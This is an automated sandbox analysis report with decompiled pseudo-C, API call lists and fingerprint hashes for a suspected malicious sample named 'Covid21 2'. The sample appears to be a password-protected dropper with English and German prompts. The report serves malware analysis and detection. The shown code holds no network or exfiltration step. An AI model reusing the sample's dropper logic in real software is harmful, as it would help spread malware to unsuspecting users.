((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  
*(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                  										_t40 =  &(_t47[2]);
                                  										_t100 = _t100 - 8;
                                  										_t109 = _t109 - 1;
                                  										_t103 = _t94 >> 0x00000008 ^  *(0x4090e8 + ((_t47[1] & 0x000000ff ^ _t94) & 0x000000ff) * 4);
                                  									} while (_t109 != 0);
                                  									_t50 =  *(_t110 + 0x10);
                                  									_t106 =  *(_t110 + 0x14);
                                  								}
                                  								if(_t100 != 0) {
                                  									do {
                                  										_t103 = _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4);
                                  										_t40 = _t40 + 1;
                                  										_t100 = _t100 - 1;
                                  									} while (_t100 != 0);
                                  								}
                                  							} while (_t97 == 0x1000);
                                  							_t98 =  *0x40b13c; // 0x27d0000
                                  							HeapFree(_t98, 0, _t106);
                                  						}
                                  						FindCloseChangeNotification(_t50); // executed
                                  					}
                                  				}
                                  				return  !_t103;
                                  			}
























                                  APIs
                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 00406987
                                  • RtlAllocateHeap.NTDLL(027D0000,00000000,00001000), ref: 004069AA
                                  • ReadFile.KERNELBASE(00000000,00000000,00001000,?,00000000,?,?,00000000,00000000), ref: 004069CE
                                  • HeapFree.KERNEL32(027D0000,00000000,00000000,?,?,00000000,00000000), ref: 00406B05
                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000), ref: 00406B0D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: FileHeap$AllocateChangeCloseCreateFindFreeNotificationRead
                                  • String ID:
                                  • API String ID: 3835257504-0
                                  • Opcode ID: 3652f549abcd2857d86857aab28a77ee2e5e896dfda86d6c962bdceb55ecb8e0
                                  • Instruction ID: ff62adfd02c82ff6d2fb6992739edd60424dd107fe33d02030225fc65b1a4817
                                  • Opcode Fuzzy Hash: 3652f549abcd2857d86857aab28a77ee2e5e896dfda86d6c962bdceb55ecb8e0
                                  • Instruction Fuzzy Hash: D9417A326403910BD3149F74EDDAB773760EB46301F09823AEB82A62D2D67D9514DB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00403B70(_Unknown_base(*)()* _a4) {
                                  				_Unknown_base(*)()* _t6;
                                  				_Unknown_base(*)()* _t7;
                                  				_Unknown_base(*)()* _t8;
                                  				_Unknown_base(*)()* _t9;
                                  
                                  				 *0x40b214 = _a4;
                                  				_a4 = E00403B30;
                                  				_t3 =  &_a4; // 0x403b30
                                  				_t6 =  *_t3;
                                  				if(_t6 == 0) {
                                  					_t7 =  *0x40b218; // 0x0
                                  					_t8 = SetUnhandledExceptionFilter(_t7);
                                  					 *0x40b218 = 0;
                                  					return _t8;
                                  				} else {
                                  					if( *0x40b218 != 0) {
                                  						_a4 = _t6;
                                  						goto ( *0x40a728);
                                  					}
                                  					_t9 = SetUnhandledExceptionFilter(_t6); // executed
                                  					 *0x40b218 = _t9;
                                  					return _t9;
                                  				}
                                  			}








                                  APIs
                                  • SetUnhandledExceptionFilter.KERNELBASE(0;@,00401302,00000000), ref: 00403BAC
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00401302,00000000), ref: 00403BC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID: 0;@$0;@
                                  • API String ID: 3192549508-1108649562
                                  • Opcode ID: 64c2b6b9c31235df9d05b2dba24abafc85a962d7f965a94dd5b50041edd19de7
                                  • Instruction ID: 03ed1251e5b82d0a9b1dd8357dd2ea466bfd254288420da3d75d37e4e8d64f8a
                                  • Opcode Fuzzy Hash: 64c2b6b9c31235df9d05b2dba24abafc85a962d7f965a94dd5b50041edd19de7
                                  • Instruction Fuzzy Hash: 2EF0A5B0545300DBC700DF94DA8C60A7BF8EBA875AF00887EA005A7361C778DA90DB9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 80%
                                  			E00401000(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v44;
                                  				intOrPtr _v52;
                                  				void _t9;
                                  				intOrPtr _t28;
                                  				CHAR* _t62;
                                  				intOrPtr* _t64;
                                  				intOrPtr _t67;
                                  				intOrPtr* _t70;
                                  				CHAR* _t73;
                                  				intOrPtr _t74;
                                  				CHAR* _t75;
                                  				intOrPtr* _t76;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t82;
                                  				intOrPtr _t85;
                                  				intOrPtr* _t88;
                                  				intOrPtr* _t94;
                                  				intOrPtr _t108;
                                  				void* _t110;
                                  				intOrPtr _t113;
                                  				intOrPtr _t115;
                                  				intOrPtr* _t118;
                                  				intOrPtr _t120;
                                  				intOrPtr _t121;
                                  				intOrPtr _t126;
                                  				intOrPtr _t127;
                                  				void* _t129;
                                  				intOrPtr _t146;
                                  				intOrPtr _t147;
                                  				intOrPtr _t148;
                                  				void* _t150;
                                  				intOrPtr _t163;
                                  				intOrPtr _t167;
                                  				void* _t168;
                                  				intOrPtr _t169;
                                  				intOrPtr _t171;
                                  				intOrPtr _t174;
                                  				CHAR* _t177;
                                  				intOrPtr _t181;
                                  				CHAR* _t185;
                                  				intOrPtr _t186;
                                  				CHAR* _t187;
                                  				CHAR* _t188;
                                  				intOrPtr _t189;
                                  				CHAR* _t190;
                                  				intOrPtr _t191;
                                  				intOrPtr* _t213;
                                  				intOrPtr _t215;
                                  				intOrPtr _t216;
                                  				intOrPtr _t222;
                                  				void* _t224;
                                  				void* _t226;
                                  				intOrPtr _t242;
                                  				intOrPtr _t247;
                                  				void* _t262;
                                  				intOrPtr _t263;
                                  				void* _t264;
                                  				void* _t279;
                                  				void* _t280;
                                  				void* _t281;
                                  				intOrPtr _t282;
                                  				intOrPtr _t284;
                                  				void* _t285;
                                  				intOrPtr _t286;
                                  				intOrPtr _t287;
                                  				intOrPtr _t288;
                                  				intOrPtr _t289;
                                  				intOrPtr _t290;
                                  				intOrPtr _t291;
                                  				void* _t292;
                                  				intOrPtr _t294;
                                  				void* _t295;
                                  				intOrPtr _t296;
                                  				intOrPtr _t297;
                                  				intOrPtr _t298;
                                  				intOrPtr _t299;
                                  				void* _t300;
                                  				intOrPtr _t301;
                                  				intOrPtr _t302;
                                  				intOrPtr _t304;
                                  				intOrPtr _t306;
                                  				intOrPtr _t307;
                                  				intOrPtr _t308;
                                  				intOrPtr _t309;
                                  				void* _t310;
                                  				void* _t311;
                                  				void* _t313;
                                  				void* _t314;
                                  				intOrPtr _t315;
                                  				intOrPtr _t316;
                                  				void* _t318;
                                  				void* _t332;
                                  				void* _t333;
                                  				void* _t334;
                                  				intOrPtr* _t335;
                                  				void* _t342;
                                  
                                  				_t342 = __eflags;
                                  				_t333 = __esi;
                                  				_t332 = __edi;
                                  				_t262 = __edx;
                                  				_t224 = __ecx;
                                  				memset(0x40b13c, 0, 0xc8);
                                  				_t335 = _t334 + 0xc;
                                  				 *0x40b140 = GetModuleHandleA(0);
                                  				_t9 = HeapCreate(0, 0x1000, 0); // executed
                                  				 *0x40b13c = _t9;
                                  				E00403000(_t262); // executed
                                  				E00407470(); // executed
                                  				E00406807();
                                  				E00406040();
                                  				E00404AB3(); // executed
                                  				E004040E0(_t224); // executed
                                  				E00403D90();
                                  				E0040393B();
                                  				E00403694();
                                  				_push(7);
                                  				_push(0x40a384);
                                  				 *0x40b1fc = E00403EF0(8, 0x40b200);
                                  				_push(7);
                                  				_push(0x40b1f4);
                                  				_t263 =  *0x40b1f4; // 0x27d12d0
                                  				E00403060(_t20, _t263);
                                  				E004030A0(0x401, 8, 0x40a37c);
                                  				 *0x40b174 = E00403DC0(0x400);
                                  				VerLanguageNameA(GetUserDefaultLangID(),  *0x40b174, 8); // executed
                                  				CharLowerA( *0x40b174);
                                  				_t28 =  *0x40b3f8; // 0x0
                                  				_push(_t28);
                                  				E00403DE0( *0x40b174, 8);
                                  				_t264 = _t28;
                                  				E004030F0(0x40b178, _t264);
                                  				E00403E30( *0x40b174);
                                  				_push( *0x40b178);
                                  				_pop(_t226);
                                  				E004074C0(_t226, "deutsch");
                                  				if(_t342 == 0) {
                                  					E00403108(0x40b17c, "Continue?");
                                  					E00403108(0x40b180, "Error!");
                                  					E00403108(0x40b184, "Can not create some of your include files.");
                                  					E00403108(0x40b188, "Can not allocate the memory.");
                                  					E00403108(0x40b18c, "Wrong password.");
                                  					E00403108(0x40b190, "Overwrite?");
                                  					E00403108(0x40b194, "The file ");
                                  					E00403108(0x40b198, " already exists in the current directory. Overwrite?");
                                  					E00403108(0x40b19c, "An unknown error occured. The program will be terminated.");
                                  					E00403108(0x40b1a0, "This program is not supported on this operating system.");
                                  					E00403108(0x40b1a4, "Choose a location to save the files.");
                                  					E00403108(0x40b1a8, "Password");
                                  					_t239 = 0x40b1ac;
                                  					E00403108(0x40b1ac, "Please enter the password.");
                                  				} else {
                                  					E00403108(0x40b17c, "Fortfahren?");
                                  					E00403108(0x40b180, "Fehler!");
                                  					E00403108(0x40b184, "Einige Include Dateien konnten nicht erstellt werden.");
                                  					E00403108(0x40b188, 0x40a174);
                                  					E00403108(0x40b18c, "Falsches Passwort.");
                                  					E00403108(0x40b190, 0x40a10f);
                                  					E00403108(0x40b194, "Die Datei ");
                                  					E00403108(0x40b198, 0x40a24a);
                                  					E00403108(0x40b19c, "Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.");
                                  					E00403108(0x40b1a0, 0x40a290);
                                  					E00403108(0x40b1a4, 0x40a03a);
                                  					E00403108(0x40b1a8, "Passwort");
                                  					_t239 = 0x40b1ac;
                                  					E00403108(0x40b1ac, "Bitte geben Sie das Passwort ein.");
                                  				}
                                  				if(E00403CD7() >= 0x32) {
                                  					E00403B70(E004020A6);
                                  					 *0x40b1b4 = E00403A66(_t239);
                                  					 *0x40b1b8 = GetModuleHandleA(0);
                                  					_t213 =  *0x40b1b4; // 0x0
                                  					__eflags = _t213;
                                  					if(_t213 > 0) {
                                  						 *0x40b1bc = 0;
                                  						while(1) {
                                  							_t222 =  *0x40b1b4; // 0x0
                                  							__eflags = _t222 - 1 -  *0x40b1bc; // 0x0
                                  							if(__eflags < 0) {
                                  								goto L9;
                                  							}
                                  							_t191 =  *0x40b3f8; // 0x0
                                  							E00403A18(_t239,  *0x40b1bc, _t191);
                                  							_t314 = _t191;
                                  							E004030F0(0x40b1c0, _t314);
                                  							_push( *0x40b1c0);
                                  							L00408011();
                                  							_t315 =  *0x40b1c4; // 0x0
                                  							_push( *0x40b3f8);
                                  							E004074F0(_t315);
                                  							_t316 =  *0x40b1c0; // 0x0
                                  							E004074F0(_t316);
                                  							E004074F0(0x40a00e);
                                  							_t239 = 0x40b1c4;
                                  							_pop(_t318);
                                  							E004030F0(0x40b1c4, _t318);
                                  							 *0x40b1bc =  &(( *0x40b1bc)[1]);
                                  						}
                                  					}
                                  					L9:
                                  					__eflags = E004020C9( *0x40b1b8, "OPS");
                                  					if(__eflags == 0) {
                                  						_push(0x10);
                                  						E004036A2( *0x40b180,  *0x40b19c);
                                  						_push(1);
                                  					} else {
                                  						_t62 =  *0x40b174; // 0x43e018
                                  						 *0x40b1c8 = _t62;
                                  						E00401BF4(__eflags,  *0x40b1c8);
                                  						_t64 = E004020C9( *0x40b1b8, "NOPS");
                                  						__eflags = _t64;
                                  						if(_t64 == 0) {
                                  							_push(0x10);
                                  							E004036A2( *0x40b180,  *0x40b19c);
                                  							_push(1);
                                  						} else {
                                  							_t67 =  *0x40b3f8; // 0x0
                                  							_push(_t67);
                                  							E00403DE0( *0x40b174,  *0x40b1b0);
                                  							_t239 = 0x40b1cc;
                                  							_t279 = _t67;
                                  							E004030F0(0x40b1cc, _t279);
                                  							_t70 = E004020C9( *0x40b1b8, "BDFINOPS");
                                  							__eflags = _t70;
                                  							if(_t70 == 0) {
                                  								_push(0x10);
                                  								E004036A2( *0x40b180,  *0x40b19c);
                                  								_push(1);
                                  							} else {
                                  								_t73 =  *0x40b174; // 0x43e018
                                  								 *0x40b1d0 = _t73;
                                  								_t74 =  *0x40b1b0; // 0x25a4cf
                                  								 *0x40b154 = _t74;
                                  								_t75 =  *0x40b1d0; // 0x43da74
                                  								 *0x40b148 = _t75;
                                  								_t76 = E004020C9( *0x40b1b8, "INOPS");
                                  								__eflags = _t76;
                                  								if(_t76 != 0) {
                                  									_t188 =  *0x40b174; // 0x43e018
                                  									 *0x40b1d4 = _t188;
                                  									_t189 =  *0x40b1b0; // 0x25a4cf
                                  									 *0x40b158 = _t189;
                                  									_t190 =  *0x40b1d4; // 0x6984e8
                                  									 *0x40b14c = _t190;
                                  								}
                                  								_t78 = E004020C9( *0x40b1b8, "FINOPS");
                                  								__eflags = _t78;
                                  								if(_t78 != 0) {
                                  									_t185 =  *0x40b174; // 0x43e018
                                  									 *0x40b1d8 = _t185;
                                  									_t186 =  *0x40b1b0; // 0x25a4cf
                                  									 *0x40b15c = _t186;
                                  									_t187 =  *0x40b1d8; // 0x43e018
                                  									 *0x40b150 = _t187;
                                  								}
                                  								_t80 = E004020C9( *0x40b1b8, 0x40a0c7);
                                  								__eflags = _t80;
                                  								if(_t80 == 0) {
                                  									L40:
                                  									_t82 =  *0x40b3f8; // 0x0
                                  									_push(_t82);
                                  									E00403DE0( *0x40b148,  *0x40b154);
                                  									_t280 = _t82;
                                  									E004030F0(0x40b1e4, _t280);
                                  									_t85 =  *0x40b3f8; // 0x0
                                  									_push(_t85);
                                  									E00403DE0( *0x40b14c,  *0x40b158);
                                  									_t281 = _t85;
                                  									E004030F0(0x40b1e8, _t281);
                                  									_t88 = E004020C9( *0x40b1b8, "DFINOPS");
                                  									__eflags = _t88;
                                  									if(_t88 == 0) {
                                  										L55:
                                  										_t282 =  *0x40b170; // 0x29a4838
                                  										_push( *0x40b3f8);
                                  										E004074F0(_t282);
                                  										E004074F0(0x40a0b9);
                                  										_t284 =  *0x40b1cc; // 0x29a4f30
                                  										E004074F0(_t284);
                                  										_t239 = 0x40b1cc;
                                  										_pop(_t285);
                                  										E004030F0(0x40b1cc, _t285);
                                  										_push( *0x40b1cc);
                                  										_t94 = E00406170(__eflags, 1);
                                  										__eflags = _t94;
                                  										if(_t94 == 0) {
                                  											E00405EA0( *0x40b1cc);
                                  											E0040203D();
                                  											_push(0x10);
                                  											E004036A2( *0x40b180,  *0x40b19c);
                                  											_push( *0x40b170);
                                  											L00403196();
                                  											_push(1);
                                  										} else {
                                  											E00406250(_t332, 1,  *0x40b1e4);
                                  											E00405FD0(1);
                                  											_t286 =  *0x40b1e8; // 0x29a4e60
                                  											_t239 = 0;
                                  											__eflags = 0;
                                  											E004074C0(0, _t286);
                                  											if(__eflags == 0) {
                                  												_push( *0x40b1e8);
                                  												E00402130();
                                  											}
                                  											_push( *0x40b3f8);
                                  											_t287 =  *0x40b1c4; // 0x0
                                  											_push( *0x40b3f8);
                                  											E004074F0(_t287);
                                  											_t288 =  *0x40b16c; // 0x0
                                  											E004074F0(_t288);
                                  											 *0x40b3f8 =  *0x40b3f8 + 1;
                                  											_push( *0x40b168);
                                  											_push( *0x40b1cc);
                                  											_t289 =  *0x40a38c; // 0x29a06f0
                                  											_v44 = _v44 + _t289;
                                  											E00402779();
                                  											_pop( *0x40b3f8);
                                  											E0040203D();
                                  											E00405EA0( *0x40b1cc); // executed
                                  											_push( *0x40b3f8);
                                  											_t108 =  *0x40b3f8; // 0x0
                                  											E00403A79(__eflags,  *0x40b3f8);
                                  											 *0x40b3f8 =  *0x40b3f8 + 1;
                                  											_t290 =  *0x40a38c; // 0x29a06f0
                                  											 *_t335 =  *_t335 + _t290;
                                  											_t110 = E00405E15(_t108, _t108);
                                  											 *0x40b3f8 =  *0x40b3f8 + 1;
                                  											_t291 =  *0x40a38c; // 0x29a06f0
                                  											 *_t335 =  *_t335 + _t291; // executed
                                  											E00405E90(_t110,  *0x40b3f8); // executed
                                  											_pop( *0x40b3f8);
                                  											_push( *0x40b170); // executed
                                  											L00403196(); // executed
                                  											_push(0);
                                  										}
                                  									} else {
                                  										_t113 =  *0x40b3f8; // 0x0
                                  										_push(_t113);
                                  										E00403A18(0x40b1e8, 0, _t113);
                                  										 *0x40b3f8 =  *0x40b3f8 + 1;
                                  										_t115 =  *0x40b3f8; // 0x0
                                  										E00403DE0( *0x40b174,  *0x40b1b0);
                                  										_t292 = _t115;
                                  										_t242 = _t115;
                                  										 *0x40b3f8 = _t242;
                                  										_t243 = _t242 +  *0x40a38c;
                                  										__eflags = _t292 +  *0x40a38c;
                                  										E004074C0(_t242 +  *0x40a38c, _t292 +  *0x40a38c);
                                  										if(__eflags == 0) {
                                  											L44:
                                  											_t118 = 0;
                                  											__eflags = 0;
                                  										} else {
                                  											_t216 =  *0x40b1b4; // 0x0
                                  											__eflags = _t216 - 1;
                                  											if(_t216 != 1) {
                                  												goto L44;
                                  											} else {
                                  												_t118 = 1;
                                  											}
                                  										}
                                  										__eflags = _t118;
                                  										if(__eflags == 0) {
                                  											goto L55;
                                  										} else {
                                  											_t120 =  *0x40b3f8; // 0x0
                                  											_t121 =  *0x40b3f8; // 0x0
                                  											E00405DD5(__eflags, _t121);
                                  											 *0x40b3f8 =  *0x40b3f8 + 1;
                                  											_t294 =  *0x40a38c; // 0x29a06f0
                                  											_v52 = _v52 + _t294;
                                  											E004036F8(_t243, _t333,  *0x40b1a4, _t121, _t120);
                                  											_t295 = _t120;
                                  											E004030F0(0x40b1ec, _t295);
                                  											_t296 =  *0x40b1ec; // 0x0
                                  											_t239 = 0;
                                  											__eflags = 0;
                                  											E004074C0(0, _t296);
                                  											if(__eflags != 0) {
                                  												L54:
                                  												_t126 =  *0x40b3f8; // 0x0
                                  												_t127 =  *0x40b3f8; // 0x0
                                  												E00403A79(__eflags,  *0x40b3f8);
                                  												 *0x40b3f8 =  *0x40b3f8 + 1;
                                  												_t297 =  *0x40a38c; // 0x29a06f0
                                  												 *_t335 =  *_t335 + _t297;
                                  												_t129 = E00405E15(_t127, _t127);
                                  												 *0x40b3f8 =  *0x40b3f8 + 1;
                                  												_t298 =  *0x40a38c; // 0x29a06f0
                                  												 *_t335 =  *_t335 + _t298;
                                  												E00405E90(_t129, _t126);
                                  												 *0x40b3f8 = _t126;
                                  												_push( *0x40b170);
                                  												L00403196();
                                  												_push(0);
                                  											} else {
                                  												_t299 =  *0x40b1ec; // 0x0
                                  												_push( *0x40b3f8);
                                  												E004074F0(_t299);
                                  												_pop(_t300);
                                  												E004030F0(0x40b168, _t300);
                                  												_t301 =  *0x40b1e8; // 0x29a4e60
                                  												_t239 = 0;
                                  												__eflags = 0;
                                  												E004074C0(0, _t301);
                                  												if(__eflags == 0) {
                                  													_push( *0x40b1e8);
                                  													E00402130();
                                  												}
                                  												__eflags = E00406230(1,  *0x40b1cc);
                                  												if(__eflags == 0) {
                                  													L52:
                                  													_push( *0x40b1cc);
                                  													__eflags = E00406170(__eflags, 1);
                                  													if(__eflags != 0) {
                                  														E00406250(_t332, 1,  *0x40b1e4);
                                  														E00405FD0(1);
                                  													}
                                  													goto L54;
                                  												} else {
                                  													E00405FD0(1);
                                  													_push( *0x40b3f8);
                                  													_t302 =  *0x40b194; // 0x29a0588
                                  													E004074F0(_t302);
                                  													E004074F0(0x40a010);
                                  													_t304 =  *0x40b1cc; // 0x29a4f30
                                  													E004074F0(_t304);
                                  													E004074F0(0x40a010);
                                  													_t306 =  *0x40b198; // 0x29a05a0
                                  													E004074F0(_t306);
                                  													 *0x40b3f8 =  *0x40b3f8 + 1;
                                  													_t307 =  *0x40a38c; // 0x29a06f0
                                  													_v52 = _v52 + _t307;
                                  													_t146 = E004036A2( *0x40b190,  *0x40b3f8);
                                  													 *0x40b3f8 = 0x24;
                                  													 *0x40b1f0 = _t146;
                                  													_t215 =  *0x40b1f0; // 0x0
                                  													__eflags = _t215 - 7;
                                  													if(__eflags != 0) {
                                  														goto L52;
                                  													} else {
                                  														_t147 =  *0x40b3f8; // 0x0
                                  														_t148 =  *0x40b3f8; // 0x0
                                  														E00403A79(__eflags,  *0x40b3f8);
                                  														 *0x40b3f8 =  *0x40b3f8 + 1;
                                  														_t308 =  *0x40a38c; // 0x29a06f0
                                  														 *_t335 =  *_t335 + _t308;
                                  														_t150 = E00405E15(_t148, _t148);
                                  														 *0x40b3f8 =  *0x40b3f8 + 1;
                                  														_t309 =  *0x40a38c; // 0x29a06f0
                                  														 *_t335 =  *_t335 + _t309;
                                  														E00405E90(_t150, _t147);
                                  														 *0x40b3f8 = _t147;
                                  														_push( *0x40b170);
                                  														L00403196();
                                  														_push(0);
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									E00404DE6(0, 0, 0, 0xc8, 0x6e,  *0x40b1a8, 0xc80001);
                                  									E004042BD(1, 0x15, 0xf, 0x9e, 0x14,  *0x40b1ac);
                                  									E004043AE(2, 0x15, 0x28, 0x9e, 0x14, 0x40a00d, 0x20);
                                  									E004045B3(3, 0x3d, 0x4b, 0x4e, 0x14, "OK");
                                  									E00404E09(_t239, __eflags, 0, 0xd, 4);
                                  									E004045D3(2);
                                  									while(1) {
                                  										_push(E0040505E());
                                  										__eflags = 0x10 -  *_t335;
                                  										if(0x10 ==  *_t335) {
                                  											break;
                                  										}
                                  										__eflags = 0x332d -  *_t335;
                                  										if(0x332d !=  *_t335) {
                                  											__eflags = 0x332c -  *_t335;
                                  											if(0x332c !=  *_t335) {
                                  												goto L34;
                                  											} else {
                                  												_push(E00405074());
                                  												__eflags = 3 -  *_t335;
                                  												if(__eflags != 0) {
                                  													goto L34;
                                  												} else {
                                  													_t163 =  *0x40b3f8; // 0x0
                                  													E004045FC(__eflags, 2, _t163);
                                  													_t310 = _t163;
                                  													E004030F0(0x40b1dc, _t310);
                                  													E00404925(_t332, __eflags, 0);
                                  													_t335 = _t335 + 8;
                                  													goto L35;
                                  												}
                                  											}
                                  										} else {
                                  											_push(E00405066());
                                  											__eflags = 4 -  *_t335;
                                  											if(__eflags != 0) {
                                  												L34:
                                  												continue;
                                  											} else {
                                  												_t181 =  *0x40b3f8; // 0x0
                                  												E004045FC(__eflags, 2, _t181);
                                  												_t313 = _t181;
                                  												E004030F0(0x40b1dc, _t313);
                                  												E00404925(_t332, __eflags, 0);
                                  												_t335 = _t335 + 8;
                                  												L35:
                                  												_t167 =  *0x40b3f8; // 0x0
                                  												_push(_t167);
                                  												_t168 = E004031F0( *0x40b1dc);
                                  												_t169 =  *0x40b1dc; // 0x0
                                  												E00406860(__eflags, _t169, _t168, _t167);
                                  												 *0x40b3f8 =  *0x40b3f8 + 1;
                                  												_t171 =  *0x40b3f8; // 0x0
                                  												E00403DE0( *0x40b174,  *0x40b1b0);
                                  												_t311 = _t171;
                                  												_t247 = _t171;
                                  												 *0x40b3f8 = _t247;
                                  												_t239 = _t247 +  *0x40a38c;
                                  												__eflags = _t311 +  *0x40a38c;
                                  												E004074C0(_t247 +  *0x40a38c, _t311 +  *0x40a38c);
                                  												if(__eflags != 0) {
                                  													_t174 = E004020C9( *0x40b1b8, 0x40a0c9);
                                  													__eflags = _t174;
                                  													if(_t174 != 0) {
                                  														_t177 =  *0x40b174; // 0x43e018
                                  														 *0x40b1e0 = _t177;
                                  													}
                                  													_push( *0x40b15c);
                                  													_push( *0x40b158);
                                  													_push( *0x40b154);
                                  													_push( *0x40b1e0);
                                  													_push( *0x40b1d8);
                                  													_push( *0x40b1d4);
                                  													_push( *0x40b1d0);
                                  													_push( *0x40b1dc);
                                  													_push( *0x40b1b8);
                                  													E00401D57();
                                  													goto L40;
                                  												} else {
                                  													_push(0x10);
                                  													E004036A2( *0x40b180,  *0x40b18c);
                                  													_push( *0x40b170);
                                  													L00403196();
                                  													_push(1);
                                  												}
                                  											}
                                  										}
                                  										goto L62;
                                  									}
                                  									_push( *0x40b170);
                                  									L00403196();
                                  									_push(0);
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_push(0x10);
                                  					E004036A2( *0x40b180,  *0x40b1a0);
                                  					_push(0);
                                  				}
                                  				L62:
                                  				ExitProcess();
                                  				HeapDestroy( *0x40b13c); // executed
                                  				ExitProcess(??); // executed
                                  				E00403B0B();
                                  				E00403DB0(E00403CC0());
                                  				E00404150();
                                  				E00404A13(_t239);
                                  				return E0040681C(E00406030());
                                  			}
                                  0x004016cc
                                  0x004016cd
                                  0x004016d3
                                  0x004016d9
                                  0x004016df
                                  0x004016e4
                                  0x0040171f
                                  0x00401724
                                  0x00401726
                                  0x00401728
                                  0x0040172d
                                  0x0040172d
                                  0x00401732
                                  0x00401738
                                  0x0040173e
                                  0x00401744
                                  0x0040174a
                                  0x00401750
                                  0x00401756
                                  0x0040175c
                                  0x00401762
                                  0x00401768
                                  0x00000000
                                  0x004016e6
                                  0x004016e6
                                  0x004016f7
                                  0x004016fc
                                  0x00401702
                                  0x0040170a
                                  0x0040170a
                                  0x004016e4
                                  0x00401611
                                  0x00000000
                                  0x00401601
                                  0x004015dc
                                  0x004015e2
                                  0x004015ea
                                  0x004015ea
                                  0x00401510
                                  0x00401458
                                  0x004013fe
                                  0x004012db
                                  0x004012db
                                  0x004012ec
                                  0x00401bb6
                                  0x00401bb6
                                  0x00401bbb
                                  0x00401bbb
                                  0x00401bc6
                                  0x00401bcb
                                  0x00401bd0
                                  0x00401bda
                                  0x00401bdf
                                  0x00401be4
                                  0x00401bf3

                                  APIs
                                  • memset.MSVCRT ref: 0040100F
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0040101C
                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                    • Part of subcall function 00407470: HeapCreate.KERNELBASE(00000001,00001000,00000000,?,00401049,00000000,00001000,00000000,00000000), ref: 0040747C
                                    • Part of subcall function 00407470: RtlAllocateHeap.NTDLL(029A0000,00000001,00004104), ref: 004074AA
                                    • Part of subcall function 00406807: HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                    • Part of subcall function 00404AB3: LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                    • Part of subcall function 00404AB3: LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                    • Part of subcall function 004040E0: RtlInitializeCriticalSection.NTDLL(0040B454), ref: 004040EA
                                    • Part of subcall function 004040E0: GetStockObject.GDI32(00000011), ref: 004040F2
                                    • Part of subcall function 004040E0: memset.MSVCRT ref: 0040412E
                                    • Part of subcall function 00403D90: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                    • Part of subcall function 0040393B: RtlInitializeCriticalSection.NTDLL(0040B400), ref: 00403950
                                    • Part of subcall function 00403694: 6FA4DB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                    • Part of subcall function 00403694: CoInitialize.OLE32(00000000), ref: 0040369B
                                    • Part of subcall function 00403EF0: RtlAllocateHeap.NTDLL(00000000,0000002C), ref: 00403EFD
                                    • Part of subcall function 00403060: HeapFree.KERNEL32(00000000,?,?,027D12B8,00000000,004010A6,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000), ref: 00403091
